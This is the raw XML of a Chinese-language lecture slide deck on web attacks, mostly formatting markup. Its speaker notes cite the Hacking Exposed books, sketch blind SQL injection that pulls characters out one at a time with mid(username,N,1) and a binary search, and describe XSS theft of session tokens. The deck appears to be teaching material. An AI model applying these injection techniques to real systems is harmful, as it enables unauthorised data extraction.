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3"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId34"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="532" r:id="rId3"/>
    <p:sldId id="551" r:id="rId4"/>
    <p:sldId id="552" r:id="rId5"/>
    <p:sldId id="553" r:id="rId6"/>
    <p:sldId id="554" r:id="rId7"/>
    <p:sldId id="555" r:id="rId8"/>
    <p:sldId id="556" r:id="rId9"/>
    <p:sldId id="557" r:id="rId10"/>
    <p:sldId id="558" r:id="rId11"/>
    <p:sldId id="559" r:id="rId12"/>
    <p:sldId id="560" r:id="rId13"/>
    <p:sldId id="539" r:id="rId14"/>
    <p:sldId id="561" r:id="rId15"/>
    <p:sldId id="540" r:id="rId16"/>
    <p:sldId id="541" r:id="rId17"/>
    <p:sldId id="542" r:id="rId18"/>
    <p:sldId id="562" r:id="rId19"/>
    <p:sldId id="543" r:id="rId20"/>
    <p:sldId id="533" r:id="rId21"/>
    <p:sldId id="544" r:id="rId22"/>
    <p:sldId id="567" r:id="rId23"/>
    <p:sldId id="568" r:id="rId24"/>
    <p:sldId id="569" r:id="rId25"/>
    <p:sldId id="566" r:id="rId26"/>
    <p:sldId id="545" r:id="rId27"/>
    <p:sldId id="570" r:id="rId28"/>
    <p:sldId id="571" r:id="rId29"/>
    <p:sldId id="572" r:id="rId30"/>
    <p:sldId id="573" r:id="rId31"/>
    <p:sldId id="548" r:id="rId32"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6815138" cy="9942513"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-CN"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="宋体" charset="0"/>
        <a:cs typeface="宋体" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana"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797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2" autoAdjust="0"/>
    <p:restoredTop sz="83673" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="15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236" y="-96"/>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7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter"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7172" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>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7173" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>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2006C244-B358-6549-8339-BB75E8D087AE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108588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156675"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51204" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="923925" y="746125"/>
            <a:ext cx="4970463"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56677" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="681038" y="4722813"/>
            <a:ext cx="5453062"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56678" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>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156679" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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F4E35D2F-058B-0E45-85E7-81A1A3A78635}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21896416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77B23878-CFD7-C642-A0E0-814892AE0B6A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial"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0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>课时</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4C98AF2F-DDB1-E34E-9D84-30B20714779B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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0"/>
              </a:rPr>
              <a:t>HackingExposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Windows 2000 Hacking Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Hacking Exposed Web Applications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Select top</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>，第一行，折半查找</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mid(username,N,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" u="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：从第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" u="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" u="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个字符开始选第一个字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" u="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4E35D2F-058B-0E45-85E7-81A1A3A78635}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>13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80744E39-5877-4E4F-AFC2-0716565C3FDB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial"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charset="0"/>
              </a:rPr>
              <a:t>黑客攻防进阶－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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4C98AF2F-DDB1-E34E-9D84-30B20714779B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial"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0"/>
              </a:rPr>
              <a:t>HackingExposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Windows 2000 Hacking Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Hacking Exposed Web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8E4CEC0E-C1FA-D441-8B12-34E774A6E529}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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0"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Cross-site_scripting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Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>:DOM(document object model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>文档对象模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，客户端脚本处理逻辑导致的安全问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4E35D2F-058B-0E45-85E7-81A1A3A78635}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607495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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>者利用应用程序中的跨站漏洞，驱使用户将攻击者发送会话令牌</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4E35D2F-058B-0E45-85E7-81A1A3A78635}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71689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5654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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1125538"/>
            <a:ext cx="8178800" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</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fld id="{23DAAB2B-251E-5447-A855-8FEA765EC18C}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日</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fld id="{6A38C9CA-9EF6-E248-A51B-45088B2119DF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109063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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5590DC99-E815-FA41-9DFC-9127EE262DB3}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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6" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0C6560C9-33E3-B247-9048-6B5A1CFA2602}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3496195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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1B2899D3-CE19-204F-B5DB-7DAA3D80D7B9}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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6" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C47AE38C-9AD8-B64B-85FD-1972ED8EE78D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="624916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66738" y="3962400"/>
            <a:ext cx="8001000" cy="2057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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9192C607-16BD-AE48-9F77-07B0B1963CDA}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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7" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D1C626F0-58E4-9748-AB63-04D576B9D382}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1100989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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1E82E277-DAE2-A54E-BF41-7746D2A47692}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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6" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2B82716F-770A-4440-B77D-123F37D0E268}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
